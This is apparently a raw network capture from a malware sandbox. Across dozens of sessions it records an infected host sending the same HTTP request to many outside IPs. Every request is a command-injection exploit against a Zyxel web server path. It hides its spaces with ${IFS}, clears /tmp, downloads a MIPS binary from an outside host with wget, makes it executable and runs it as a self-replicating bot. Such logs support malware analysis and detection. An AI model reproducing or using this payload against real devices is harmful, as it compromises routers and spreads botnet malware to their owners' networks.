                                        Jan 14, 2024 16:18:50.590617895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5844192.168.2.1342830126.133.85.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590667009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5845192.168.2.133543646.77.142.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590723991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5846192.168.2.133767263.114.11.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590739965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5847192.168.2.1341180142.32.202.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590790033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5848192.168.2.1332810212.190.48.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590845108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5849192.168.2.1356616201.97.227.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590867996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5850192.168.2.1359294136.67.241.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590908051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5851192.168.2.135569858.64.176.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590955973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5852192.168.2.1353574103.209.197.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.590993881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5853192.168.2.134339292.16.164.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591042042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5854192.168.2.1356328110.248.199.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591103077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5855192.168.2.1356744166.36.40.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591121912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5856192.168.2.134023089.136.38.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591161966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5857192.168.2.1350256158.47.167.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591206074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5858192.168.2.134840414.135.67.71443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591243982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5859192.168.2.1337914136.5.57.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591284037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5860192.168.2.1358056129.123.222.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591331959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5861192.168.2.1336750176.29.97.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591371059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5862192.168.2.133870871.223.39.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591407061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5863192.168.2.133696084.90.127.194443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591422081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5864192.168.2.13601524.219.226.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591480017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5865192.168.2.1357550222.42.124.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591507912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5866192.168.2.13355645.56.231.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591547012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5867192.168.2.1339206133.211.46.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591593027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5868192.168.2.1345454128.107.239.156443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591639042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5869192.168.2.134986877.29.170.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591670990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5870192.168.2.1337784124.159.101.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591686010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5871192.168.2.1351550204.163.48.54443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591727972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5872192.168.2.1346958131.79.244.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591779947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5873192.168.2.134675678.29.70.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591823101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5874192.168.2.134525680.46.83.131443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591845036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5875192.168.2.134252253.187.49.50443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591881037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5876192.168.2.134141234.146.5.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591927052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5877192.168.2.135416024.102.221.69443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591953993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5878192.168.2.1334640149.92.185.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.591993093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5879192.168.2.1339282136.149.23.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592025995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5880192.168.2.1358014120.97.205.161443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592087030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5881192.168.2.134693449.99.191.211443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592114925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5882192.168.2.136058439.215.186.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592150927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5883192.168.2.1338374186.59.132.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592200041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5884192.168.2.1347870108.1.254.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592233896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5885192.168.2.134161824.244.244.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592287064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5886192.168.2.1335798172.238.132.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592299938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5887192.168.2.1350610158.65.44.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592336893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5888192.168.2.135680045.94.130.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592391014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5889192.168.2.1342374194.69.128.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592423916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5890192.168.2.135997241.152.228.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592484951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5891192.168.2.1351868138.158.172.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592494011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5892192.168.2.1355958192.130.45.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592560053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5893192.168.2.134541471.69.134.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592612028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5894192.168.2.135733841.100.183.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592654943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5895192.168.2.1344480170.72.28.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592680931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5896192.168.2.135609875.216.90.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592727900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5897192.168.2.135813277.237.33.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592757940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5898192.168.2.1354658185.38.16.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592811108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5899192.168.2.134426085.231.163.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592870951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5900192.168.2.135446693.24.169.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592927933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5901192.168.2.1340522191.124.161.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.592953920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5902192.168.2.1332786101.35.23.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593003988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5903192.168.2.1353478143.53.240.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593059063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5904192.168.2.1354644153.21.174.242443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593094110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5905192.168.2.135120835.251.211.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:50.593137026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5906192.168.2.1348570150.71.217.7443
                                        TimestampBytes transferredDirectionData
